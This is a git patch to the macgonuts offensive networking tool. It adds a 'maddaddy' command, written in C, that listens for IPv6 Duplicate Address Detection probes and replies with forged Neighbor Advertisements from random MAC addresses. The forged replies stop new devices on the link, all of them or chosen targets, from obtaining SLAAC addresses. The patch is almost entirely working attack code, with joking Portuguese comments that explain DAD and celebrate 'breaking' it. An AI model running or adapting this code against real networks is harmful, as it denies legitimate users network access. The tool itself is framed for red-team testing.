From 9a446154fa1a82c83372b133aaf220c5bd552c30 Mon Sep 17 00:00:00 2001
From: rafael-santiago <voidbrainvoid@tutanota.com>
Date: Wed, 20 Sep 2023 23:12:20 -0300
Subject: [PATCH] Implement maddaddy task

---
 README.md                         |   4 +-
 src/cmd/macgonuts_exec.c          |   2 +
 src/cmd/macgonuts_maddaddy_task.c | 400 ++++++++++++++++++++++++++++++
 src/cmd/macgonuts_maddaddy_task.h |  17 ++
 4 files changed, 421 insertions(+), 2 deletions(-)
 create mode 100644 src/cmd/macgonuts_maddaddy_task.c
 create mode 100644 src/cmd/macgonuts_maddaddy_task.h

diff --git a/README.md b/README.md
index fd7c090..43fc311 100644
--- a/README.md
+++ b/README.md
@@ -38,8 +38,8 @@ red teams. *Once it stated, when using this tool you are assuming that any damag
 law infringements that some wrong action taken by you could cause is of your entire responsibility*.
 
 **Sponsoring**:  I have not been running this project for profit. It is only a thing that I do at my spare time. It is a
-weekend project. I try to evolve it according to necessities I have been facing up during my information security
-professional career. If you liked it or it is being useful to you somehow and you really want to contribute
+weekend project. A pet project. I try to evolve it according to necessities I have been facing up during my information
+security professional career. If you liked it or it is being useful to you somehow and you really want to contribute
 with money, try to redirect it to a local charity institution, an ONG of your choice or even your own community.
 You can also do [pull requests](https://github.com/rafael-santiago/macgonuts/pulls) proposing improvements.
 Do some [bug report](https://github.com/rafael-santiago/macgonuts/issues) if a bug is annoying you. Maybe you should
diff --git a/src/cmd/macgonuts_exec.c b/src/cmd/macgonuts_exec.c
index c48864b..6486929 100644
--- a/src/cmd/macgonuts_exec.c
+++ b/src/cmd/macgonuts_exec.c
@@ -17,6 +17,7 @@
 #include <cmd/macgonuts_dnsspoof_task.h>
 #include <cmd/macgonuts_xablau_task.h>
 #include <cmd/macgonuts_caleaboqui_task.h>
+#include <cmd/macgonuts_maddaddy_task.h>
 #include <cmd/macgonuts_version_task.h>
 #include <cmd/macgonuts_banners.h>
 #include <macgonuts_status_info.h>
@@ -49,6 +50,7 @@ struct macgonuts_task_ctx {
     MACGONUTS_CMD_REGISTER_TASK(dnsspoof),
     MACGONUTS_CMD_REGISTER_TASK(xablau),
     MACGONUTS_CMD_REGISTER_TASK(caleaboqui),
+    MACGONUTS_CMD_REGISTER_TASK(maddaddy),
     MACGONUTS_CMD_REGISTER_TASK_ALIAS(xablau, neighscan),
     MACGONUTS_CMD_REGISTER_TASK_ALIAS(caleaboqui, shh),
     MACGONUTS_CMD_REGISTER_TASK(version),
diff --git a/src/cmd/macgonuts_maddaddy_task.c b/src/cmd/macgonuts_maddaddy_task.c
new file mode 100644
index 0000000..e30c80b
--- /dev/null
+++ b/src/cmd/macgonuts_maddaddy_task.c
@@ -0,0 +1,400 @@
+/*
+ * Copyright (c) 2023, Rafael Santiago
+ * All rights reserved.
+ *
+ * This source code is licensed under the BSD-style license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+#include <cmd/macgonuts_maddaddy_task.h>
+#include <cmd/macgonuts_option.h>
+#include <macgonuts_etherconv.h>
+#include <macgonuts_socket_common.h>
+#include <macgonuts_socket.h>
+#include <macgonuts_icmphdr.h>
+#include <macgonuts_ndphdr.h>
+#include <macgonuts_ip6hdr.h>
+#include <macgonuts_ethfrm.h>
+#include <macgonuts_ipchsum.h>
+#include <macgonuts_status_info.h>
+
+static int g_QuitMadDaddy = 0;
+
+static int do_mad_daddy(const char *iface, const uint8_t *hw_addrs, const size_t hw_addrs_size);
+
+static inline __attribute__((unused)) int send_fake_na(const macgonuts_socket_t rsk,
+                                                       const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static void sigint_watchdog(int signo);
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size);
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size);
+
+static inline int is_solicited_node_multicast_link(const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static inline int is_solicited_node_multicast_proto(const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static inline int is_ndp_ns(const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static inline int should_dad_go_bad(const uint8_t *ethbuf, const ssize_t ethbuf_size,
+                                    const uint8_t *hw_addrs, const size_t hw_addrs_size);
+
+int macgonuts_maddaddy_task(void) {
+    int err = EXIT_FAILURE;
+    const char *lo_iface = macgonuts_get_option("lo-iface", NULL);
+    char **targets = NULL;
+    size_t targets_nr = 0;
+    uint8_t *hw_addrs = NULL;
+    size_t hw_addrs_size = 0;
+
+    if (lo_iface == NULL) {
+        macgonuts_si_error("--lo-iface option is missing.\n");
+        goto macgonuts_maddaddy_task_epilogue;
+    }
+
+    targets = macgonuts_get_array_option("targets", NULL, &targets_nr);
+    if (targets != NULL) {
+        hw_addrs = preprocess_targets_array(targets, targets_nr, &hw_addrs_size);
+        macgonuts_free_array_option_value(targets, targets_nr);
+        targets = NULL;
+    }
+
+    err = do_mad_daddy(lo_iface, hw_addrs, hw_addrs_size);
+
+macgonuts_maddaddy_task_epilogue:
+
+    if (hw_addrs != NULL) {
+        free(hw_addrs);
+    }
+
+    if (targets != NULL) {
+        macgonuts_free_array_option_value(targets, targets_nr);
+    }
+
+    return err;
+}
+
+int macgonuts_maddaddy_task_help(void) {
+    macgonuts_si_print("use: macgonuts maddady --lo-iface=<label> [ --targets=<hw-addr-list> ]\n");
+    return EXIT_SUCCESS;
+}
+
+static int do_mad_daddy(const char *iface, const uint8_t *hw_addrs, const size_t hw_addrs_size) {
+    char buf[256];
+    macgonuts_socket_t rsk = -1;
+    uint8_t ethbuf[1<<10];
+    ssize_t ethbuf_size = 0;
+
+    if (macgonuts_get_addr_from_iface_unix(buf, sizeof(buf) - 1, 6, iface) != EXIT_SUCCESS) {
+        macgonuts_si_error("interface `%s` does not support IPv6.\n");
+        return EXIT_FAILURE;
+    }
+
+    if (macgonuts_set_iface_promisc_on(iface) != EXIT_SUCCESS) {
+        macgonuts_si_error("unable to set %s to promisc mode.\n", iface);
+        return EXIT_FAILURE;
+    }
+
+    rsk = macgonuts_create_socket(iface, 1);
+    if (rsk == -1) {
+        macgonuts_si_error("unable to create raw socket.\n");
+        macgonuts_set_iface_promisc_off(iface);
+        return EXIT_FAILURE;
+    }
+
+    signal(SIGINT, sigint_watchdog);
+    signal(SIGTERM, sigint_watchdog);
+
+    while (!g_QuitMadDaddy) {
+        ethbuf_size = macgonuts_recvpkt(rsk, ethbuf, sizeof(ethbuf));
+        if (ethbuf_size > 0
+            && is_solicited_node_multicast_link(ethbuf, ethbuf_size)
+            && is_solicited_node_multicast_proto(ethbuf, ethbuf_size)
+            && is_ndp_ns(ethbuf, ethbuf_size)
+            && should_dad_go_bad(ethbuf, ethbuf_size, hw_addrs, hw_addrs_size)
+            && send_fake_na(rsk, ethbuf, ethbuf_size) == EXIT_SUCCESS) {
+            (void)snprintf(buf, sizeof(buf) - 1,
+                           "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", ethbuf[ 6], ethbuf[ 7], ethbuf[ 8],
+                                                            ethbuf[ 9], ethbuf[10], ethbuf[11]);
+            macgonuts_si_info("SLAAC based network ingress was denied for device `%s`.\n", buf);
+        }
+        usleep(10);
+    }
+
+    macgonuts_release_socket(rsk);
+    macgonuts_set_iface_promisc_off(iface);
+
+    return EXIT_SUCCESS;
+}
+
+static void sigint_watchdog(int signo) {
+    g_QuitMadDaddy = 1;
+}
+
+static inline int send_fake_na(const macgonuts_socket_t rsk, const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    // Zzzzz...
+    struct macgonuts_ethfrm_ctx eth;
+    struct macgonuts_ip6hdr_ctx ip6;
+    struct macgonuts_icmphdr_ctx icmp6;
+    struct macgonuts_ndp_nsna_hdr_ctx ndp;
+    struct macgonuts_ip6_pseudo_hdr_ctx ip6phdr;
+    int err = EXIT_FAILURE;
+    size_t icmp_pkt_size = 0;
+    unsigned char *fake_na = NULL;
+    size_t fake_na_size = 0;
+
+    assert(ethbuf_size > 54);
+
+    // INFO(Rafael): Senhoras e senhores acostumados com os tutoriais em serie a la Linkedin e outros blaus,
+    //               aqui voce ve o que acontece no DAD quando ocorre a merda. Sem firula e direto ao ponto.
+    //
+    //               "- English, please?!" Go instruct yourself in more than one language mister culture....
+    //
+    //               Para tambem de lavar tenis na pia da cozinha, escove os dentes mais do que uma vez ao dia etc.
+    //               Conhecer novas culturas eh sempre bom! Brincadeira! Mas nem tanto... Enfim...
+    //
+    //               Vamos dizer assim, aqui voce tem uma nocao de guerrilha do que eh DAD/SLAAC e todas
+    //               essas siglas bobas que sao basicamente sobre:
+    //
+    //               Era uma vez um novo host ingressando na LAN IPv6...
+    //
+    //               novo host: "- tem alguem com esse endereco IPv6 ai?" (a.k.a NDP/NS)
+    //               (grilos)... (a.k.a "- afff mais um... vamos deixa-lo no vacuo... - ignora que ele passa")
+    //               novo host (meio grilado): "- ah! entao vou ficar com essa bosta mesmo como sendo o meu,
+    //                                           valeu! Vou ser chato e perguntar mais umas tranqueiras segura ai..."
+    //               (todos): "- AAAAAAAAAAAaaaafffffffffffffffff!....................."
+    //
+    //               Era uma vez um novo host ingressando na LAN IPv6...
+    //
+    //               novo host: "- tem alguem com esse endereco IPv6 ai?" (a.k.a NDP/NS)
+    //               host previo: "- EU!!!! POR QUE?!!!!! HEIN???! ALGUM PROBLEMA???!! HUM? HEIN?!" (a.k.a NDP/NA boladao)
+    //               novo host (meio intimidado): "- ah... mal ae... vou tentar outro, fica sussa..."
+    //               (todos): "Hahaha ele acreditou! - shh! - shh!" (zoeira isso aqui, especificamente, nao acontece!)
+    //
+    //               Eu poderia te cansar explicando que a "bosta" que o novo host usou eh uma especie de "bosta"
+    //               com pouquissimas chances de ja ter alguem usando-a pois eh baseada em 24 bits pegos do MAC
+    //               excluindo a porcao francesa dele o OUI.... Sendo mais academico eh uma "bosta controlada"...
+    //               Eu ainda poderia te matar de tedio falando sobre o paradoxo do aniversario... mas nao...
+    //               deixa isso para o chato do seu professor.
+    //
+    //               Viu? sem firula eh isso... agora vamos a parte de entortar esse treco bobo ate quebrar...
+
+    memset(&eth, 0, sizeof(eth));
+    memset(&ip6, 0, sizeof(ip6));
+    memset(&icmp6, 0, sizeof(icmp6));
+    memset(&ndp, 0, sizeof(ndp));
+    memset(&ip6phdr, 0, sizeof(ip6phdr));
+
+    ndp.reserv = 0x20000000; // INFO(Rafael): Override flag. "- Hummm eh mesmo?!"
+    ndp.options = (uint8_t *)malloc(8);
+    if (ndp.options == NULL) {
+        macgonuts_si_error("unable to allocate NDP options buffer.\n");
+        goto send_fake_na_epilogue;
+    }
+    ndp.options_size = 8;
+
+    ndp.options[0] = 0x02;
+    ndp.options[1] = 0x01;
+    // INFO(Rafael): Na linha do "Mad Daddy" dos The Cramps precisamos ser malvados e
+    //               perversos e o mais stealth possivel, nao me chamo Dorothy... >:D
+    //               Criancas fechem os olhos que o tio doido vai zaralhar o SLAAC do
+    //               slack que nao configurou o IPv6 de forma menos carneiro...
+    //               O unico slack que eh bom eh o ware, Slackware onde meu rio faz
+    //               a curva! Linux sem systemd e rodinhas... Enfim, foco...
+    if (macgonuts_getrandom_raw_ether_addr(&ndp.options[2], 6) != EXIT_SUCCESS) {
+        macgonuts_si_error("unable to get random MAC address.\n");
+        goto send_fake_na_epilogue;
+    }
+    memcpy((uint8_t *)&ndp.target_addr, &ethbuf[14 + 8], 16);
+
+    icmp6.type = kNDPMsgTypeNeighborAdvertisement;
+    icmp6.code = 0;
+    icmp6.payload = (uint8_t *)macgonuts_make_ndp_nsna_pkt(&ndp, &icmp6.payload_size);
+    if (icmp6.payload == NULL) {
+        macgonuts_si_error("unable to make NDP/NA packet.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    ip6.version = 6;
+    ip6.next_header = 0x3A;
+    ip6.hop_limit = 0xFF;
+
+    memcpy(&ip6.src_addr[0], &ethbuf[14 + 8], 16);
+
+    ip6.dest_addr[0] = 0xFF; // INFO(Rafael): All nodes (link-local scope).
+    ip6.dest_addr[1] = 0x02;
+    ip6.dest_addr[15] = 0x01;
+
+    memcpy(&ip6phdr.src_addr[0], &ip6.src_addr[0], sizeof(ip6phdr.src_addr));
+    memcpy(&ip6phdr.dest_addr[0], &ip6.dest_addr[0], sizeof(ip6phdr.dest_addr));
+    icmp_pkt_size = 4 + icmp6.payload_size;
+    ip6phdr.upper_layer_pkt_len[0] = (icmp_pkt_size >> 24) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[1] = (icmp_pkt_size >> 16) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[2] = (icmp_pkt_size >>  8) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[3] = icmp_pkt_size & 0xFF;
+
+    ip6.payload = (uint8_t *)macgonuts_make_icmp_pkt(&icmp6, &icmp_pkt_size, &ip6phdr, sizeof(ip6phdr));
+    if (ip6.payload == NULL) {
+        macgonuts_si_error("unable to make ICMP packet.\n");
+        goto send_fake_na_epilogue;
+    }
+    ip6.payload_length = icmp_pkt_size & 0xFFFF;
+
+    eth.dest_hw_addr[0] = 0x33;
+    eth.dest_hw_addr[1] = 0x33;
+    eth.dest_hw_addr[5] = 0x01;
+    memcpy(&eth.src_hw_addr[0], &ndp.options[2], sizeof(eth.src_hw_addr)); // INFO(Rafael): Sentiu? Fedeu.
+                                                                           //               Mas no modo stealth.
+                                                                           //               "Entao relaxa, afina o
+                                                                           //               violino, pega a gasolina
+                                                                           //               e risca o fosforo"
+                                                                           //                -- Nero (37 d.C segundos
+                                                                           //                    antes de merdar tudo).
+    eth.ether_type = MACGONUTS_ETHER_TYPE_IP6;
+
+    eth.data = (uint8_t *)macgonuts_make_ip6_pkt(&ip6, &eth.data_size);
+    if (eth.data == NULL) {
+        macgonuts_si_error("unable to make IPv6 packet.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    fake_na = macgonuts_make_ethernet_frm(&eth, &fake_na_size);
+    if (fake_na == NULL) {
+        macgonuts_si_error("unable to make ethernet frame.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    if (macgonuts_sendpkt(rsk, fake_na, fake_na_size) == fake_na_size) {
+        err = EXIT_SUCCESS; // MuHauHauhAUaHuAHAUhAUaHuaHaUHAuAHUAHUAhAUHAUAHUAhAUhUAhAUhaAuHA!
+                            // Eu sei no inferno tem um monte de 486 me esperando e especificacao bosta! :D
+                            // Mas tem tambem Ramones, Motorhead, Black Sabbath, Jimi Hendrix e cia!
+                            // Entao vamos explodir tudo que eh link-local por ai para garantir!
+    }
+
+send_fake_na_epilogue: // INFO(Rafael): Com tanto comentario sincerao, isso aqui nem ficou tao ruim, hein?! :D
+
+    if (fake_na != NULL) {
+        free(fake_na);
+    }
+
+    macgonuts_release_ethfrm(&eth);
+    macgonuts_release_ip6hdr(&ip6);
+    macgonuts_release_icmphdr(&icmp6);
+    macgonuts_release_ndp_nsna_hdr(&ndp);
+
+    // WARN(Rafael): Viu? Desmistificou? Deu umas risadas? Entao blau! Desliga esse caiau e bora viver! ;)
+    //               Vai pegar um pouco de Vitamina D seu ser sombrio!! Vai dar um volta sem seu cosplay
+    //               noturno de morcego Vlad! Morrer de sedentarismo seria patetico! Serio mesmo...
+    //               so dizendo... Fui!
+
+    return err;
+}
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size) {
+    char **target = targets;
+    char **targets_end = targets + targets_nr;
+    uint8_t *macs_buf = NULL;
+    uint8_t *mp = NULL;
+
+    *macs_buf_size = targets_nr * 6;
+    macs_buf = (uint8_t *)malloc(*macs_buf_size);
+
+    if (macs_buf == NULL) {
+        macgonuts_si_error("unable to allocate MAC bufs list.\n");
+        return NULL;
+    }
+
+    mp = macs_buf;
+
+    while (target != targets_end) {
+        if (macgonuts_get_raw_ether_addr(mp, 6, *target, strlen(*target)) != EXIT_SUCCESS) {
+            macgonuts_si_error("unable to pre-process MAC `%s`.\n", *target);
+            free(macs_buf);
+            return NULL;
+        }
+        target++;
+        mp += 6;
+    }
+
+    return macs_buf;
+}
+
+static inline int is_solicited_node_multicast_link(const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    return (ethbuf_size > 14 && ethbuf[0] == 0x33 && ethbuf[1] == 0x33 && ethbuf[2] == 0xFF);
+}
+
+static inline int is_solicited_node_multicast_proto(const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    return (ethbuf_size > 54 // INFO(Rafael): Ethernet frame size + IPv6 header size.
+            && ethbuf[12     ] == 0x86 // INFO(Rafael): IPv6 ether type.
+            && ethbuf[13     ] == 0xDD
+            && ethbuf[14 + 24] == 0xFF // INFO(Rafael): Solicited node multicast address.
+            && ethbuf[14 + 25] == 0x02
+            && ethbuf[14 + 26] == 0x00
+            && ethbuf[14 + 27] == 0x00
+            && ethbuf[14 + 28] == 0x00
+            && ethbuf[14 + 29] == 0x00
+            && ethbuf[14 + 30] == 0x00
+            && ethbuf[14 + 31] == 0x00
+            && ethbuf[14 + 32] == 0x00
+            && ethbuf[14 + 33] == 0x00
+            && ethbuf[14 + 34] == 0x00
+            && ethbuf[14 + 35] == 0x01
+            && ethbuf[14 + 36] == 0xFF
+            && ethbuf[14 + 37] == ethbuf[3]
+            && ethbuf[14 + 38] == ethbuf[4]
+            && ethbuf[14 + 39] == ethbuf[5]);
+}
+
+static inline int is_ndp_ns(const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    struct macgonuts_icmphdr_ctx icmp6;
+    struct macgonuts_ndp_nsna_hdr_ctx ndp;
+    int is = 0;
+
+    assert(ethbuf_size > 54);
+
+    memset(&icmp6, 0, sizeof(icmp6));
+    memset(&ndp, 0, sizeof(ndp));
+
+    if (macgonuts_read_icmp_pkt(&icmp6, &ethbuf[54], ethbuf_size - 54) != EXIT_SUCCESS
+        || icmp6.type != kNDPMsgTypeNeighborSolicitation
+        || icmp6.code != 0) {
+        goto is_ndp_ns_epilogue;
+    }
+
+    if (macgonuts_read_ndp_nsna_pkt(&ndp, icmp6.payload, icmp6.payload_size) != EXIT_SUCCESS) {
+        goto is_ndp_ns_epilogue;
+    }
+
+    is = (ndp.target_addr[0] == 0xFE800000
+          && ndp.target_addr[1] == 0x0); // INFO(Rafael): Does it seems a link local unicast address?
+
+is_ndp_ns_epilogue:
+
+    macgonuts_release_ndp_nsna_hdr(&ndp);
+    macgonuts_release_icmphdr(&icmp6);
+
+    return is;
+}
+
+static inline int should_dad_go_bad(const uint8_t *ethbuf, const ssize_t ethbuf_size,
+                                    const uint8_t *hw_addrs, const size_t hw_addrs_size) {
+    const uint8_t *curr_hw_addr = NULL;
+    const uint8_t *hw_addrs_end = hw_addrs + hw_addrs_size;
+    int go_bad = 0;
+
+    assert(ethbuf_size > 14);
+
+    if (hw_addrs == NULL || hw_addrs_size == 0) {
+        return 1;
+    }
+
+    curr_hw_addr = hw_addrs;
+    while (curr_hw_addr < hw_addrs_end && !go_bad) {
+        go_bad = (memcmp(&ethbuf[6], curr_hw_addr, 6) == 0);
+        curr_hw_addr += 6;
+    }
+
+    return go_bad;
+}
+
+
diff --git a/src/cmd/macgonuts_maddaddy_task.h b/src/cmd/macgonuts_maddaddy_task.h
new file mode 100644
index 0000000..e9ac850
--- /dev/null
+++ b/src/cmd/macgonuts_maddaddy_task.h
@@ -0,0 +1,17 @@
+/*
+ * Copyright (c) 2023, Rafael Santiago
+ * All rights reserved.
+ *
+ * This source code is licensed under the BSD-style license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+#ifndef MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H
+#define MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H 1
+
+#include <macgonuts_types.h>
+
+int macgonuts_maddaddy_task(void);
+
+int macgonuts_maddaddy_task_help(void);
+
+#endif // MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H